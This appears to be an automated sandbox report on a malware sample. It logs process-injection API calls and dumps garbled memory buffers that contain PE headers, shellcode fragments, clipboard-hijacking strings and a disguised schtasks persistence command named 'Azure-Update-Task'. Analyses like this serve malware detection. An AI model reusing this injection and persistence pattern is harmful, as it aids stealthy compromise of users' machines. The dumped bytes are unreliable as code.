Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1472 created a remote thread in non-child process 1048
CreateRemoteThread Aug. 9, 2021, 9:41 a.m.	thread_identifier: 1888 process_identifier: 1048 function_address: 0x000c0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x00000518	1	1308	0
CreateRemoteThread Aug. 9, 2021, 9:41 a.m.	thread_identifier: 996 process_identifier: 1048 function_address: 0x00180000 flags: 0 stack_size: 0 parameter: 0x00170000 process_handle: 0x00000518	1	1308	0
CreateRemoteThread Aug. 9, 2021, 9:41 a.m.	thread_identifier: 2780 process_identifier: 1048 function_address: 0x00260000 flags: 0 stack_size: 0 parameter: 0x00250000 process_handle: 0x00000518	1	1312	0
CreateRemoteThread Aug. 9, 2021, 9:41 a.m.	thread_identifier: 2512 process_identifier: 1048 function_address: 0x00280000 flags: 0 stack_size: 0 parameter: 0x00270000 process_handle: 0x00000518	1	1316	0

Manipulates memory of a non-child process indicative of process injection (23 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2412 manipulating memory of non-child process 3788
Process injection	Process 2412 manipulating memory of non-child process 3824
Process injection	Process 2412 manipulating memory of non-child process 3860
Process injection	Process 2412 manipulating memory of non-child process 3896
Process injection	Process 2412 manipulating memory of non-child process 3932
Process injection	Process 1472 manipulating memory of non-child process 1048
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3788 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000039c		3221225496	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3824 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000394		3221225496	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3860 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003dc		3221225496	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3896 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003d0		3221225496	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3932 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003ec	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 471040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10580000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00170000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00180000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00280000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0	0

Potential code injection by writing to the memory of another process (29 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2412 injected into non-child 3932
Process injection	Process 1472 injected into non-child 1048
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à¨ Ç à@ @ÄÆWàÿ H.text$§ ¨ `.rsrcÿàª@@.reloc²@B base_address: 0x00400000 process_identifier: 3932 process_handle: 0x000003ec	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: P8h àÌlãÌ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyNameFileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyrightLegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly> base_address: 0x0040e000 process_identifier: 3932 process_handle: 0x000003ec	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: À 7 base_address: 0x00410000 process_identifier: 3932 process_handle: 0x000003ec	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3932 process_handle: 0x000003ec	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: hÿhÿ×IsuÕ?wkernel32.dllÿ4ûHTúH¾tÊs úHÉÊs ý~húHlaÊsQyÊs ý~úH:Ês6;ÐsûHmØËsÜúHÜúHÿÿÿÿHûH4ûH?Bÿ$B$ûH,%BìúH$ûHQACYACXûHäEB base_address: 0x000c0000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: GetProcAddress base_address: 0x000d0000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: kernel32.dll base_address: 0x000e0000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: Õ?w"suEsu base_address: 0x00170000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIChØICèEÿÿPèGÿÿEèhèIChØICè-ÿÿPè/ÿÿEähøIChØICèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHCÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00180000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: LoadLibraryA base_address: 0x00230000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: kernel32.dll base_address: 0x00240000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: Õ?w"suEsu$# base_address: 0x00250000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIChØICèEÿÿPèGÿÿEèhèIChØICè-ÿÿPè/ÿÿEähøIChØICèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHCÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00260000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: X¹X base_address: 0x00270000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔô?Cè5ÿÿ3ÀUh½HCdÿ0d ÆEÿG<ÇEô»Ãj@h0Eô@PPEô@4ÃPèÿÿEð}ðt0hjEðPèÿÿj@h0Eô@PPEô@4ÃPVèâÿÿEð}ðuû0vEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÖÿÿjjMèºGCÆè_ýÿÿÀtÆEÿ3ÀZYYdhÄHCEÔô?CèÿÿÃ base_address: 0x00280000 process_identifier: 1048 process_handle: 0x00000518	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^àBna @ À@aWØ H.texttA B `.rsrcØD@@.reloc J@B base_address: 0x00400000 process_identifier: 4024 process_handle: 0x000002b4	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: 8Ph DèêD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.08InternalNameuactest.exe(LegalCopyright @OriginalFilenameuactest.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00408000 process_identifier: 4024 process_handle: 0x000002b4	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: `p1 base_address: 0x0040a000 process_identifier: 4024 process_handle: 0x000002b4	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 4024 process_handle: 0x000002b4	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^àî; @@ @;W@è`\: H.textô `.rsrcè@@@.reloc`.@B base_address: 0x00400000 process_identifier: 3180 process_handle: 0x000002bc	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: 0ð; base_address: 0x00406000 process_identifier: 3180 process_handle: 0x000002bc	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3180 process_handle: 0x000002bc	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l*<@)8 0.text `.rdata @@.data`0@À.reloc@ @B base_address: 0x00400000 process_identifier: 3332 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: Øèú++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@%@È!@!@ø#@P @à @ @%@ "@8!@B` ´¸)¸B`GCTL.text$mn 0.idata$50 .rdata¸)´.rdata$zzzdbgl(.idata$2.idata$3¨0.idata$4Ø¶.idata$60`.bss¨`+ Ð+( Øèú++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObjectCloseHandle^ExitProcessåCreateProcessWCopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll base_address: 0x00402000 process_identifier: 3332 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l<@)8 0.text `.rdata @@.data`0@À.reloc@ @BUììhà%@ÿ @EüÀTSV5 @Whü%@PÿÖh&@£0@ÿÐh$&@Eøÿ0@h8&@Eðÿ0@hP&@Øÿ0@hd&@øÿ0@hP&@Eôÿ0@h\|&@ÿuüÿÖuüh&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@uøh'@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h'@W£@0@ÿ80@h'@S£,0@ÿ80@h¨'@Vÿ80@uôh´'@V£0@ÿ80@]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃUììðûÿÿVhP3öVÿ0@øýÿÿPVVjVÿ( @Àxfh4(@øýÿÿPÿ0@øýÿÿPÿX0@ÀuVøýÿÿPÿD0@h\(@øýÿÿPÿ0@øýÿÿPðûÿÿPÿT0@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ @øýÿÿè jÿÿ @ÌUììXSVWjD_W3ÛE¨SPñÿ(0@jEì}¨SPÿ(0@Ähj@ÿ0@ºx(@EüMüèºÄ(@Müèºè(@MüèrÖMüèhºø(@Müè[}üEìPE¨PSShSSSWh)@ÿ @ÀuÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì5 @ÿÖÿuðÿÖÿtWÿ00@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ 0@ø"j0Vÿ0@ÀjOVÿ0@ÀuvjIVÿ0@ÀuiSVÿ0@Àu]Vÿ7ÿT0@ØÛtKÓ+ÑúRèºP @YMüEüèûVÿ 0@MüCèé?tÿ7ÿ @Eü3À@éýjl[f>3ufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèàº @éYÿÿÿVÿ 0@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèvºà @éïþÿÿjb[Vÿ 0@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè º%@éþÿÿf>LuiVÿ 0@ø"u]j0Vÿ0@ÀuPjOVÿ0@ÀuCjIVÿ0@jl[Àu6SVÿ0@ÀuVÿ7ÿT0@ØÛtÓ+ÑúRèº8!@éþÿÿjl[f>MufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè+º!@é¤ýÿÿVÿ 0@ø+udjlXf9u\f~tuUjcXf9FuLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè»ºÈ!@é4ýÿÿÎèêÀt'Vÿ7ÿT0@ØÛtÓ+ÑúRèº base_address: 0x00403000 process_identifier: 3332 process_handle: 0x00000520		0	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z111111¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k222¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v333ª3Í3Ó3â3ñ3ú34¤4¶4Ç4Ô4à4í45515N5\5i5v555¨5´5ß5ì5ù56!6L6Y6f6666¬6¹6È6Õ6î6777+777D7]7i77§7´7Í7æ7ÿ7818J8c8\|88¡8Ô8í8ù8949U9`9g9q9y99999®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y==¢=>>>(>=>>©>¶>Ã>å>v???? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9 base_address: 0x00404000 process_identifier: 3332 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3332 process_handle: 0x00000520	1	1	0

Code injection by writing an executable or DLL to the memory of another process (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2412 injected into non-child 3932
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à¨ Ç à@ @ÄÆWàÿ H.text$§ ¨ `.rsrcÿàª@@.reloc²@B base_address: 0x00400000 process_identifier: 3932 process_handle: 0x000003ec	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^àBna @ À@aWØ H.texttA B `.rsrcØD@@.reloc J@B base_address: 0x00400000 process_identifier: 4024 process_handle: 0x000002b4	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^àî; @@ @;W@è`\: H.textô `.rsrcè@@@.reloc`.@B base_address: 0x00400000 process_identifier: 3180 process_handle: 0x000002bc	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l*<@)8 0.text `.rdata @@.data`0@À.reloc@ @B base_address: 0x00400000 process_identifier: 3332 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 9, 2021, 9:41 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l<@)8 0.text `.rdata @@.data`0@À.reloc@ @BUììhà%@ÿ @EüÀTSV5 @Whü%@PÿÖh&@£0@ÿÐh$&@Eøÿ0@h8&@Eðÿ0@hP&@Øÿ0@hd&@øÿ0@hP&@Eôÿ0@h\|&@ÿuüÿÖuüh&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@uøh'@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h'@W£@0@ÿ80@h'@S£,0@ÿ80@h¨'@Vÿ80@uôh´'@V£0@ÿ80@]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃUììðûÿÿVhP3öVÿ0@øýÿÿPVVjVÿ( @Àxfh4(@øýÿÿPÿ0@øýÿÿPÿX0@ÀuVøýÿÿPÿD0@h\(@øýÿÿPÿ0@øýÿÿPðûÿÿPÿT0@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ @øýÿÿè jÿÿ @ÌUììXSVWjD_W3ÛE¨SPñÿ(0@jEì}¨SPÿ(0@Ähj@ÿ0@ºx(@EüMüèºÄ(@Müèºè(@MüèrÖMüèhºø(@Müè[}üEìPE¨PSShSSSWh)@ÿ @ÀuÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì5 @ÿÖÿuðÿÖÿtWÿ00@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ 0@ø"j0Vÿ0@ÀjOVÿ0@ÀuvjIVÿ0@ÀuiSVÿ0@Àu]Vÿ7ÿT0@ØÛtKÓ+ÑúRèºP @YMüEüèûVÿ 0@MüCèé?tÿ7ÿ @Eü3À@éýjl[f>3ufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèàº @éYÿÿÿVÿ 0@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèvºà @éïþÿÿjb[Vÿ 0@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè º%@éþÿÿf>LuiVÿ 0@ø"u]j0Vÿ0@ÀuPjOVÿ0@ÀuCjIVÿ0@jl[Àu6SVÿ0@ÀuVÿ7ÿT0@ØÛtÓ+ÑúRèº8!@éþÿÿjl[f>MufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè+º!@é¤ýÿÿVÿ 0@ø+udjlXf9u\f~tuUjcXf9FuLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè»ºÈ!@é4ýÿÿÎèêÀt'Vÿ7ÿT0@ØÛtÓ+ÑúRèº base_address: 0x00403000 process_identifier: 3332 process_handle: 0x00000520		0	0

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
